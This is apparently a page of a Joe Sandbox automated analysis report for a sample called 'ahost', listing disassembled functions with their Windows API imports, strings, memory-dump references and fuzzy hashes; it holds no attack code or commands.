UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91ED2BC

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 18a1dde9d9c542ff972fd2a0f1a51436f90a237a079196a8dc08a7e2c64853f6
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 30312176A08B858AEB60AF60EC403EE7374FB84744F844439DA5E47BA8DF38D548C760

Function 00007FF7F9205C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F9205CB5

Part of subcall function 00007FF7F9205608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920561C

Part of subcall function 00007FF7F91FA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8

Part of subcall function 00007FF7F91FA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA979
Part of subcall function 00007FF7F91FA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA99E

_get_daylight.LIBCMT ref: 00007FF7F9205CA4

Part of subcall function 00007FF7F9205668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920567C

_get_daylight.LIBCMT ref: 00007FF7F9205F1A
_get_daylight.LIBCMT ref: 00007FF7F9205F2B
_get_daylight.LIBCMT ref: 00007FF7F9205F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F920617C), ref: 00007FF7F9205F63

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 710ed636d11e49654cdae276d78bd6cf1d969b7de673a3ac37cbff5431a5bc76
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 8ED19122E0824246F7A4BF229C815B9A771FF44794FC48136DA6D876EDEF3DE44187A0

Function 00007FF7F91FA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7F91FA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F91FA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F91FA750
IsDebuggerPresent.KERNEL32 ref: 00007FF7F91FA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91FA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91FA79E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 3572768d45e12153d67653adfa5f92bef6f25672701e186a93ff6b9ec44830e8
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 92315636A14B8186EB60DF25EC406AEB3B4FB84754F940135DB6D43BA8EF3CD1458750

Function 00007FF7F92018E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9201930
FindFirstFileExW.KERNEL32 ref: 00007FF7F9201A3A

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 7b8449a01436663096f7b95f4e6704caa853049566eee64d0969f1d51890c5a7
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 73B16322B1869641FBB1AF619D001B9E2B1BB44BD4F845131DA6D87BEEEF3CE441C790

Function 00007FF7F9205EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F9205F1A

Part of subcall function 00007FF7F9205668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920567C

_get_daylight.LIBCMT ref: 00007FF7F9205F2B

Part of subcall function 00007FF7F9205608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920561C

_get_daylight.LIBCMT ref: 00007FF7F9205F3C

Part of subcall function 00007FF7F9205638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920564C

Part of subcall function 00007FF7F91FA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F920617C), ref: 00007FF7F9205F63

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: cd4cd10fa80ac667fd8eb97b98b36c1518a234e60b86e5ee5f59d4cb1265b996
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: 55513F22E1864286F750FF22DC815A9E771BB48784FC45235EA6DC76EADF3CE44087A0

Function 00007FF7F91ED080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7F91ED0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF7F91ED0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF7F91ED0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF7F91ED0D6

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 158d4d0f7d346b61eb5bb1f57a7c546e3b59fed1c8b56825f712c44ee32d24f1
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: DB114F26B15B05CAFF40DF60EC442A973B4FB19758F440E31DA2D867A8DF38D1548390

Function 00007FF7F9203C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF7F9203CE6
memcpy_s.LIBCPMT ref: 00007FF7F9203D11

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 868e334287396e94548900773e3376919c1d6e69da1cb376d50925973b1bc2dd
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 27C10672B1D28687E764DF19A48467AF7A1FB94784F848134DB5E93798DB3DE800CB80

Function 00007FF7F91EA4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF7F91EA991
unknown header flags set, xrefs: 00007FF7F91EA535
, xrefs: 00007FF7F91EA5CB

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: cb30102dfb3b16d45ddf0d8e2508a7cf5820a4e51c73a5b706d1b5260eb38e06
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: E5F19472E043C58BE7E5BF159888A3ABAB9EF44740F864638DA59473D8CB38F540C791

Function 00007FF7F9209798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7F92099E7
RaiseException.KERNEL32 ref: 00007FF7F92099F8

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: 4761d26f5233efe20cd85bbba54a91547e116f8af308cbbd8a3d95ff3b0d8603
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: F4B14A7BA04B898AEB55CF29C846368B7B0F744B48F548821DB6E837B8CB39D451C750

Function 00007FF7F91F3A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7F91F3DC4
, xrefs: 00007FF7F91F3B82

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: 505d3e1b4ded44bc999210672bb4c66bc169548a86d9119f5d006b9e1e97f798
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: D7E1B532D0864A81EB68AE25A950139B370FF45BCCF944135DB7E0B6D8EF29E853C790

Function 00007FF7F91EA34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF7F91EA4CB
invalid window size, xrefs: 00007FF7F91EA4B2

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: 6e73ddd1b053085b489d0c87fc7396c78f6c161dd87be3ad5bd353e09c9f2248
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: 3691D872E182C687E7A5BE15E848B3E7AB9FB44340F514239DA6A467C4CB3CF540CB91

Function 00007FF7F91FDF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF7F91FE0EA
e+000, xrefs: 00007FF7F91FE06D

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: 537df96a4f206d23c65c5d1c2d226942b8950fe629142e511c039bb1fb8202db
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: BD516C63F1C2C945E7259E35AC0076AABA1E784B98F888231CB7C47AD9EF3DE4458750

Function 00007FF7F9200938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
Instruction ID: 5ee6f8e30f5bcc59bfad5b472d2e549bf6defdab43ead6c85e0f3d0229dd6988
Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
Instruction Fuzzy Hash: 8F02BD21E5D64641FB95BF11AC04279A6B0AF45BA0FD94634DE7D863EEEE3CA400C7B0

Function 00007FF7F91FDACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7F91FDE0E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: c51605e9ff23deb51811a133fdc832f4b5c9da7386ae6bf0b967a498a8d0ee0a
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 7FA14466E0878D46EB21DF25A8007B9BBA0AB61788F458031DFBD477C9EB3DD509C391

Function 00007FF7F91F8804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF7F91F8823

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: c6bf534038462fe357fcd16a47d659d6082b495225558bde8650bd5f0fb66ac5
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: 5F517E11F0864A41FB68BE266D1117AD2A1AF84BC8BC84174DF3E477DEFE3CE45252A0

Function 00007FF7F92034F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7F92034F4

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 26e4667c2d8d043319e89d91337919d639174f6ee943e6cc287339c5347198ec
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: CCB09220E17A02C6FF483F216CC226862B47F48B00FD80278C02D80378DE2C24E55760

Function 00007FF7F91F3610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: bf9400c3b169173d8a6fe8538452751e743b18510a34117673b05f8ea02093a9
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: 9ED1B962D0864A85EB68AE25A85023DA370BF45B9CF944235CF3D0B7D9FF2DD546C3A0

Function 00007FF7F91E9870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: 5005129a6f9b3517bf20500e92e024f3860dabcc3d165a3769e7374e83f45660
